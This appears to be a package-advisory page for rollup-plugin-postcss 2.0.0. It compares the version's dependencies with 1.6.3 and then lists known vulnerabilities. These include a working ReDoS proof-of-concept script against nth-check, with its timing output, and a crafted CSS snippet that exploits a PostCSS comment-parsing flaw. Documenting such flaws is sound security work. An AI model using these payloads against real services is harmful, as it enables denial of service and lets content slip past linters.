Rollup-plugin-postcss streamlines the integration of PostCSS into Rollup workflows, enabling developers to effortlessly process CSS files within their JavaScript bundles. Version 2.0.0 delivers notable upgrades compared to version 1.6.3. One key difference lies in the updated peer dependencies, notably requiring PostCSS version 7.0.14 or higher, a significant jump from the older 6.0.21. This ensures compatibility with newer PostCSS features and plugins. Similarly, cssnano, a CSS optimizer, is bumped from version 3.10.0 to 4.1.8, implying improved CSS minification capabilities. The newer version drops the direct dependency on fs-extra, likely streamlining internal operations and potentially reducing the bundle size.
Development dependencies also see substantial changes. Version 2.0.0 embraces modern Javascript development by transitioning from babel-preset-env to @babel/preset-env and introduces @babel/core and rollup-plugin-babel, signifying an updated Babel configuration for transpilation. Jest is updated to v23.6.0 from v22.0.4 and Rollup to v1.1.2 from v0.57.1, bringing performance improvements and bug fixes. These updates suggest that version 2.0.0 prioritizes contemporary JavaScript standards, potentially leading to cleaner and more maintainable code. Developers upgrading should ensure their PostCSS configuration and Babel setup are compatible with the updated dependencies. The core functionality remains consistent: seamless PostCSS integration within Rollup, allowing for advanced CSS processing like autoprefixing, module scoping, and minification as part of the bundling process.
All the vulnerabilities related to the version 2.0.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.